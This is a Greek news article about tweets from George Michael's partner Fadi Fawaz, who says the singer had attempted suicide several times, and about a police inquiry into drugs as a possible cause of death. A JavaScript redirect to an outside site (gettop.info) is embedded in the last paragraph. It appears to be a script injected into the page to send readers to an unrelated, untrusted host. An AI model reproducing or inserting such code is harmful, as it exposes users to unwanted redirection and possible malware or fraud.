Συγκλονίζει ο σύντροφος του Τζορτζ Μάικλ: Το μόνο που ήθελε ήταν να πεθάνει

0
7

 

Για τη σχέση του με τον Τζορτζ Μάικλ και τα όσα συνέβαιναν στην ψυχή του σταρ μέχρι την τελευταία του ανάσα μιλά σε σειρά tweet ο σύντροφός του Φάντι Φαουάζ.

Όπως αποκαλύπτει ο άνθρωπος που τον βρήκε νεκρό στο κρεβάτι του στο σπίτι του στο Οξφορντσάιρ, ο Τζορτζ Μάικλ αποπειράθηκε πολλές φορές να αυτοκτονήσει, ενώ το μόνο που ήθελε πραγματικά ήταν να πεθάνει, υπονοώντας ότι ο σταρ αυτοκτόνησε.

fadi-2

fadi-3

fadi-4

Τα tweet ακολούθησαν μετά την πληροφορία ότι η αστυνομία στο πλαίσιο ερευνών για τον θάνατο του εμβληματικού Βρετανού καλλιτέχνη θα συνομιλήσει με τον Φαουάζ.

Όπως ανέφερε φίλος του Μάικλ στην Daily Star «η αστυνομία έδωσε στον Φάντι λίγες ημέρες για να πενθήσει αλλά τώρα πρέπει να βρουν αν ναρκωτικά και φάρμακα επέδρασαν στον θάνατο του Τζορτζ τώρα που οι συνθήκες θανάτου είναι φρέσκες στο μυαλό του Φάντι. Υπάρχουν ισχυρές υποψίες ότι ο θάνατός του οφείλεται σε ναρκωτικά οπότε αναζητούν ποιος προμήθευε τον Τζορτζ«.

Υπενθυμίζεται ότι η νεκροτομή δεν έδειξε σαφώς την αιτία θανάτου και τώρα αναμένονται τα αποτελέσματα από περισσότερες τοξικολογικές εξετάσεις. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here